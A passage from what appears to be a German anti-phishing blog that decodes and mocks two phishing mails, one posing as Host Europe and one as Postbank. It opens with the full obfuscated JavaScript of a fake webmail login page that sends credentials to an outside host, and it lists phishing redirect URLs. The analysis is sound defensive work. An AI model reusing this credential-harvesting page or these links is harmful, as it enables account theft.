document.write(unescape('%3C%68%65%61%64%3E%0A%20%20%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%20%3A%3A%20%57%65%6C%63%6F%6D%65%20%74%6F%20%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%2C%20%73%68%72%69%6E%6B%2D%74%6F%2D%66%69%74%3D%6E%6F%2C%20%6D%61%78%69%6D%75%6D%2D%73%63%61%6C%65%3D%31%2E%30%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%63%73%73%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%73%74%79%6C%65%73%2E%63%73%73%22%3E%0A%09%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%22%3E%0A%20%20%20%20%3C%73%74%79%6C%65%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%20%20%20%09%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%6E%6F%6E%65%3B%0A%7D%0A%40%66%6F%6E%74%2D%66%61%63%65%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%27%46%6F%6E%74%41%77%65%73%6F%6D%65%2D%73%77%61%70%27%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%64%69%73%70%6C%61%79%3A%20%73%77%61%70%3B%0A%20%20%20%20%20%20%73%72%63%3A%20%6C%6F%63%61%6C%28%27%46%6F%6E%74%41%77%65%73%6F%6D%65%27%29%2C%20%75%72%6C%28%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%32%29%20%66%6F%72%6D%61%74%28%27%77%6F%66%66%32%27%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20%3C%2F%73%74%79%6C%65%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%63%6C%61%73%73%3D%22%74%61%73%6B%2D%6C%6F%67%69%6E%20%61%63%74%69%6F%6E%2D%6E%6F%6E%65%22%3E%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%22%3E%0A%20%20%20%20%20%20%20%20%3C%68%31%20%63%6C%61%73%73%3D%22%76%6F%69%63%65%22%3E%67%6C%6F%62%61%6C%70%6F%69%6E%74%2E%65%73%20%57%65%62%6D%61%69%6C%20%4C%6F%67%69%6E%3C%2F%68%31%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%2D%63%6F%6E%74%65%6E%74%22%20%63%6C%61%73%73%3D%22%73%65%6C%65%63%74%65%64%20%6E%6F%2D%6E%61%76%62%61%72%22%20%72%6F%6C%65%3D%22%6D%61%69%6E%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%6D%61%69%6C%2E%6E%6F%76%6F%68%6F%67%61%72%2E%65%73%2F%73%6B%69%6E%73%2F%65%6C%61%73%74%69%63%2F%69%6D%61%67%65%73%2F%6C%6F%67%6F%2E%73%76%67%3F%73%3D%31%36%34%39%32%33%31%33%38%37%22%20%69%64%3D%22%6C%6F%67%6F%22%20%61%6C%74%3D%22%4C%6F%67%6F%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%66%6F%72%6D%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%6E%61%6D%65%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%63%6C%61%73%73%3D%22%70%72%6F%70%66%6F%72%6D%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%67%65%6E%65%72%61%6C%2F%61%70%69%2E%70%68%70%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%62%6F%64%79%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%61%6C%65%72%74%20%61%6C%65%72%74%2D%64%61%6E%67%65%72%22%20%69%64%3D%22%6D%73%67%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%49%6E%76%61%6C%69%64%20%50%61%73%73%77%6F%72%64%2E%2E%21%20%50%6C%65%61%73%65%20%65%6E%74%65%72%20%63%6F%72%72%65%63%74%20%70%61%73%73%77%6F%72%64%2E%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%69%64%3D%22%65%72%72%6F%72%22%20%63%6C%61%73%73%3D%22%74%65%78%74%2D%64%61%6E%67%65%72%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%54%68%61%74%20%61%63%63%6F%75%6E%74%20%64%6F%65%73%6E%27%74%20%65%78%69%73%74%2E%20%45%6E%74%65%72%20%61%20%64%69%66%66%65%72%65%6E%74%20%61%63%63%6F%75%6E%74%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%75%73%65%72%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%61%69%22%20%69%64%3D%22%61%69%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%74%65%78%74%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%55%73%65%72%6E%61%6D%65%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%70%61%73%73%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%70%72%22%20%69%64%3D%22%70%72%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%20%63%6C%61%73%73%3D%22%66%6F%72%6D%62%75%74%74%6F%6E%73%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%62%75%74%74%6F%6E%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%69%64%3D%22%73%75%62%6D%69%74%2D%62%74%6E%22%20%63%6C%61%73%73%3D%22%62%75%74%74%6F%6E%20%6D%61%69%6E%61%63%74%69%6F%6E%20%73%75%62%6D%69%74%20%62%74%6E%20%62%74%6E%2D%70%72%69%6D%61%72%79%20%62%74%6E%2D%6C%67%20%74%65%78%74%2D%75%70%70%65%72%63%61%73%65%20%77%2D%31%30%30%22%3E%4C%6F%67%69%6E%3C%2F%62%75%74%74%6F%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%70%3E%0A%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%6F%74%65%72%22%20%72%6F%6C%65%3D%22%63%6F%6E%74%65%6E%74%69%6E%66%6F%22%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%66%6F%72%6D%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%21%2D%2D%20%4F%70%74%69%6F%6E%61%6C%20%4A%61%76%61%53%63%72%69%70%74%20%2D%2D%3E%0A%20%20%20%20%3C%21%2D%2D%20%6A%51%75%65%72%79%20%66%69%72%73%74%2C%20%74%68%65%6E%20%50%6F%70%70%65%72%2E%6A%73%2C%20%74%68%65%6E%20%42%6F%6F%74%73%74%72%61%70%20%4A%53%20%2D%2D%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%6F%64%65%2E%6A%71%75%65%72%79%2E%63%6F%6D%2F%6A%71%75%65%72%79%2D%33%2E%32%2E%31%2E%73%6C%69%6D%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4B%4A%33%6F%32%44%4B%74%49%6B%76%59%49%4B%33%55%45%4E%7A%6D%4D%37%4B%43%6B%52%72%2F%72%45%39%2F%51%70%67%36%61%41%5A%47%4A%77%46%44%4D%56%4E%41%2F%47%70%47%46%46%39%33%68%58%70%47%35%4B%6B%4E%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%64%6E%6A%73%2E%63%6C%6F%75%64%66%6C%61%72%65%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%70%6F%70%70%65%72%2E%6A%73%2F%31%2E%31%32%2E%39%2F%75%6D%64%2F%70%6F%70%70%65%72%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%41%70%4E%62%67%68%39%42%2B%59%31%51%4B%74%76%33%52%6E%37%57%33%6D%67%50%78%68%55%39%4B%2F%53%63%51%73%41%50%37%68%55%69%62%58%33%39%6A%37%66%61%6B%46%50%73%6B%76%58%75%73%76%66%61%30%62%34%51%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%78%63%64%6E%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%30%2E%30%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4A%5A%52%36%53%70%65%6A%68%34%55%30%32%64%38%6A%4F%74%36%76%4C%45%48%66%65%2F%4A%51%47%69%52%52%53%51%51%78%53%66%46%57%70%69%31%4D%71%75%56%64%41%79%6A%55%61%72%35%2B%37%36%50%56%43%6D%59%6C%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%6A%61%78%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%6A%71%75%65%72%79%2F%32%2E%32%2E%34%2F%6A%71%75%65%72%79%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%73%74%61%63%6B%70%61%74%68%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%31%2E%33%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>
</html>
$ _

…ein Javascript-Programm, das ein HTML-Dokument erzeugt. Warum man das nicht direkt in HTML schreibt? Weil man etwas zu verbergen hat, natürlich. Denn selbstverständlich kann man so etwas direkt in HTML schreiben, nur, dass es dann auch jeder ohne Probleme lesen könnte und dass dann Antivirus-Schlangenöle leichtes Spiel haben. So muss ein interessierter Leser ein paar Umwege machen, wenn er neugierig wird. 🛠️

$ cat decr.pl
$l = <>;
$l =~ s/^.*\'([^\']*)\'.*$/\1/;
foreach (split /%/, $l) { printf "%c", hex($_); }
$ cat Rechnung-137784.html | grep unescape | perl decr.pl

Ja, ich weiß: Perl sieht einfach nur schrecklich und unlesbar aus, aber es tippt sich schnell. 😉️

Und nein, so große Umwege sind es nicht. Ich habe mir schon Schlimmeres angeschaut. Aber es übersteigt eben die Kenntnisse gewöhnlicher Anwender erheblich. Und das ist der Zweck der Übung. 🎭️

Ich erspare hier jetzt mal die 4546 Byte lange HTML-Ausgabe dieses winzigen Skriptes und komme auf den Punkt. Man soll im generierten Dokument einen Usernamen und ein Passwort angeben. Diese werden jedoch nicht zu HostEurope gesendet, sondern zu einer Website in der Domain mailbusinessionos (punkt) com, die ganz sicher nichts mit HostEurope zu tun hat. (Der Hoster war inzwischen so nett, dieser Phishing-Site den Stecker zu ziehen.) Danach haben kriminelle Phisher die Zugangsdaten für das Webhosting anderer Leute, und sie werden dort alles tun, was ein gutes Geschäft für kriminelle Phisher ist: Vom Betrugsshop über weiteres Phishing bis hin zu Darstellungen sexuellen Kindesmissbrauchs. Und wer hat für diese Verbrechen die Kriminalpolizei vor der Tür stehen? Richtig: Die arme Seele von Domaininhaber und Website-Betreiber, die auf ein Phishing reingefallen ist. 🎣️

Sollten Sie Fragen zu Ihrer Rechnung oder Ihrem Vertrag haben, helfe ich Ihnen gerne weiter.

Wer sich fragt, wie man verhindern kann, auf so etwas reinzufallen: Das ist sehr einfach, und man braucht dafür weder spezielle Software noch muss man besondere Kenntnisse haben. Niemals in eine E-Mail klicken! Auch nicht, um einen Anhang zu öffnen! Wenn man solche Websites wie die seiner Bank, seines Händlers, seines Webhosters etc. als Lesezeichen im Webbrowser ablegt und nur über das Lesezeichen im Webbrowser aufruft, kann einem kein Krimineller einen vergifteten Link unterschieben. Nach einer solchen Mail einfach die Website über das Lesezeichen aufrufen. Dieses bisschen Vorsicht, das nichts kostet und mit keinem Komfortverlust verbunden ist, kann viel Geld und jahrelangen Ärger ersparen. Und es ist sehr einfach. Aber das erwähnte ich ja schon. 🛡️

Also: Lasst die Phisher verhungern! Keiner vermisst sie. ⚰️

Ihr

Host Europe GmbH
Kundenservice

Host Europe GmbH • Hansestr. 111 • 51149 Köln •
Gerichtsstand: HRB 28495 • Amtsgericht Köln • Umsatzsteuer.-ID: DE187370678
Geschäftsführer: Paul Ashcroft, Tim Montag, Michele Lau, Nicholas Daddario

Wie schon gesagt: HostEurope hat mit dieser Spam nichts zu tun.

Euer Nachtwächter!

Diese Phishing-Spam aus dem täglichen Klo ist ein Zustecksel meines Lesers A. H.

Wichtige Mitteilung !

Montag, 18. April 2022

Nein, unwichtiges Phishing. 💩️

Von: Postbank AG <progress@vps.granhostingperu.com>

Tolle Domain, die die Postbank jetzt für ihre Mailadressen benutzt. 🤭️

Schon an der Stelle ist völlig klar, dass es sich nicht um eine Mail der Postbank handelt. Der Spammer hätte allerdings auch eine plausible Absenderadresse eintragen können… wenn er nur ein bisschen Hirn gehabt hätte. 😁️

Man kann in eine E-Mail jede beliebige Absenderadresse eintragen. 🤥️

An: progress@vps.granhostingperu.com

Das bin ich nicht. Diese Mail geht als BCC: an ganz viele Empfänger auf einmal. Sie ist so persönlich wie eine Postwurfsendung. 🗑️

Postbank-Logo

die neue Postbank ist da und damit werden Ihre Überweisungen in Postbank noch sicherer Um unseren Service und die Qualität unserer Leistungen auf dem höchsten Niveau zu halten

bitten wir Sie die App Bis zum 18. April 2022 aktivieren:

Hier klicken

Postbank © Alle Rechte vorbehalten

Das ist ja toll. Die neue Postbank ist da. 📯️

Sie kann zwar keine Punkte mehr schreiben und sie geht nur noch mit einer App (würde also zum Beispiel mich gar nicht mehr als Kunden haben wollen), aber dafür muss man die App auch selbst „aktivieren“. Indem man in eine Spam klickt. Und zwar sofort. Also ohne darüber noch nachzudenken. 🧠️🚫️

Wer das macht, hat verloren:

$ location-cascade https://scottwinslow.com//inc/.app
     1	https://scottwinslow.com/inc/.app/
     2	https://trgeahadhhelpgenesh.com/xamp/bodepostglawa/bazaz/
$ lynx -dump https://trgeahadhhelpgenesh.com/xamp/bodepostglawa/bazaz/ | sed 10q
   [1]Logo der Postbank. Text: Eine Bank fürs Leben. Logo der Postbank.
   Text: Eine Bank fürs Leben.
   (BUTTON) (BUTTON) (BUTTON) (BUTTON) (BUTTON) (BUTTON) (BUTTON)

Willkommen beim Postbank Banking & Brokerage

     * Melden Sie sich hier bitte mit Ihrer Postbank ID an. Nach Klick auf
       "Weiter im Anmeldeprozess" legitimieren Sie sich mit Ihrem Passwort
       oder mithilfe einer unserer Apps.
       (BUTTON) [info.png] Info
$ _

Die Website, auf der man die Zugangsdaten zu seinem Postbank-Kundenbereich angeben soll, ist natürlich nicht die Website der Postbank, obwohl sie so aussieht. Die Zugangsdaten und alle weiteren eingegebenen Daten gehen direkt an eine Betrügerbande. Wenn man darauf reinfällt, wird es teuer und es gibt eine Menge Ärger – leider nicht für die Betrüger, die sich mit dem Geld anderer Leute einen schönen, verfeinerten Lebensstil finanzieren. 🤢️

Phishing ist eine der ältesten und immer noch die häufigste Betrugsform im Internet, und die angerichteten Schäden sind enorm. Sie machen rd. ein Fünftel des Gesamtschadens durch Internetkriminalität aus. Zum Glück gibt es einen völlig sicheren Schutz vor Phishing, der einfach ist und nichts kostet: Nicht in eine E-Mail klicken! Wenn man für alle regelmäßig besuchten Websites ein Lesezeichen im Webbrowser anlegt und sich angewöhnt, diese Websites nur über das Lesezeichen zu besuchen und niemals durch einen Klick in eine Mail, dann kann einem kein Betrüger einen vergifteten Link unterschieben und man ist vor einer der häufigsten Betrungsmaschen im Internet sicher, was schnell tausende von Euro und ganz viel durch Ärger verhagelte Lebenszeit einsparen kann. Und das ohne Komfortverlust. Und mit nur minimalem Aufwand. 👍️😎️

Wenn man dann einmal eine komische „Mail seiner Bank“ bekommen sollte, die man nicht auf den ersten Blick als Betrugsversuch erkennt, ruft man einfach die Website der Bank über das Browserlesezeichen auf und meldet sich dort ganz normal an, statt darin zu klicken oder Anhänge zu öffnen. Wenn man dabei nicht einen ähnlichen Hinweis zu sehen bekommt wie in der E-Mail, dann war die E-Mail ein Phishing-Versuch und man hat einen kriminellen Angriff abgewehrt. So einfach geht das! 🛡️

Sollen die Betrüger doch verhungern! 🤬️